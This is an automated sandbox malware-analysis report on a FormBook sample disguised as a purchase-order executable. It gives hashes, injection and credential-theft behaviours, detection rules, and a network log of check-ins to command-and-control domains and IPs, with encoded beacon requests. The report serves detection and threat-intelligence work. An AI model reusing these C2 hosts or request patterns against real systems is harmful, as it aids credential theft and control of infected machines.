Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hire P.O.exe

Overview

General Information

Sample name:Hire P.O.exe
Analysis ID:1556306
MD5:838e3079ecea7cbf8d6909abe0d6f393
SHA1:0dbddc8f8935d4c464d77e418bee2ff61624d7e1
SHA256:7e88c41f8c326c85f54f8df37579e2b846bb34fc821cc14e99c0bf43c4a8fd8a
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Hire P.O.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\Hire P.O.exe" MD5: 838E3079ECEA7CBF8D6909ABE0D6F393)
    • Hire P.O.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\Hire P.O.exe" MD5: 838E3079ECEA7CBF8D6909ABE0D6F393)
      • zKwhguHavy.exe (PID: 2076 cmdline: "C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 4812 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • zKwhguHavy.exe (PID: 3732 cmdline: "C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1212 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.Hire P.O.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.Hire P.O.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T09:32:00.628951+010020507451Malware Command and Control Activity Detected192.168.2.114998185.159.66.9380TCP
                2024-11-15T09:32:24.347747+010020507451Malware Command and Control Activity Detected192.168.2.114998591.184.0.20080TCP
                2024-11-15T09:32:38.015857+010020507451Malware Command and Control Activity Detected192.168.2.1149989194.9.94.8680TCP
                2024-11-15T09:32:51.741328+010020507451Malware Command and Control Activity Detected192.168.2.1149993170.39.213.4380TCP
                2024-11-15T09:33:05.157377+010020507451Malware Command and Control Activity Detected192.168.2.114999713.248.169.4880TCP
                2024-11-15T09:33:19.457187+010020507451Malware Command and Control Activity Detected192.168.2.115000138.47.232.19480TCP
                2024-11-15T09:33:32.980413+010020507451Malware Command and Control Activity Detected192.168.2.1150005167.172.133.3280TCP
                2024-11-15T09:33:46.389247+010020507451Malware Command and Control Activity Detected192.168.2.1150009162.0.211.14380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Hire P.O.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: Hire P.O.exeReversingLabs: Detection: 57%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Hire P.O.exeJoe Sandbox ML: detected
                Source: Hire P.O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Hire P.O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: fc.pdb source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Hire P.O.exe, 00000005.00000002.1863691356.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3139982830.0000000000878000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdbSHA2568 source: Hire P.O.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zKwhguHavy.exe, 00000006.00000002.3139218530.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941529168.00000000002CE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: BaBC.pdb source: Hire P.O.exe
                Source: Binary string: wntdll.pdb source: Hire P.O.exe, Hire P.O.exe, 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.1869354697.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000003.1871372994.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0050C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0050C500
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax7_2_004F9D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h7_2_02C904DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50005 -> 167.172.133.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49985 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49997 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50001 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49993 -> 170.39.213.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49981 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49989 -> 194.9.94.86:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50009 -> 162.0.211.143:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tesetturhanzade.xyz
                Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
                Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ur0f/?Ht=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiOLfy4lE5d8KH961FjyGPsNNV+mrO2nqMYXA=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.tesetturhanzade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ggvc/?VRvXS=WfxxDba8X&Ht=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1sK6ZXv4UHMlnEy7R+vzIZHc2JfvRSKbgShg= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kantinestoel.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.deeplungatlas.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ultrawin23.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sonoscan.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.zz67x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.omnibizlux.bizConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X HTTP/1.1Accept: */*Accept-Language: en-USHost: www.vibixx.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.tangible.online
                Source: global trafficDNS traffic detected: DNS query: www.tesetturhanzade.xyz
                Source: global trafficDNS traffic detected: DNS query: www.kantinestoel.online
                Source: global trafficDNS traffic detected: DNS query: www.deeplungatlas.org
                Source: global trafficDNS traffic detected: DNS query: www.ultrawin23.shop
                Source: global trafficDNS traffic detected: DNS query: www.sonoscan.org
                Source: global trafficDNS traffic detected: DNS query: www.zz67x.top
                Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global trafficDNS traffic detected: DNS query: www.vibixx.site
                Source: unknownHTTP traffic detected: POST /ggvc/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.kantinestoel.onlineOrigin: http://www.kantinestoel.onlineCache-Control: no-cacheConnection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedReferer: http://www.kantinestoel.online/ggvc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like GeckoData Raw: 48 74 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 31 37 34 43 59 47 45 39 59 37 6d 7a 46 62 31 49 50 7a 6a 41 2f 79 77 48 49 56 79 41 4c 32 78 67 58 77 3d 3d Data Ascii: Ht=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq174CYGE9Y7mzFb1IPzjA/ywHIVyAL2xgXw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 15 Nov 2024 08:32:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-15T08:32:05.4402834Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:32:16 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:32:19 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:32:21 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:32:24 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 08:33:11 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 08:33:14 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 08:33:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 15 Nov 2024 08:33:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 08:33:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
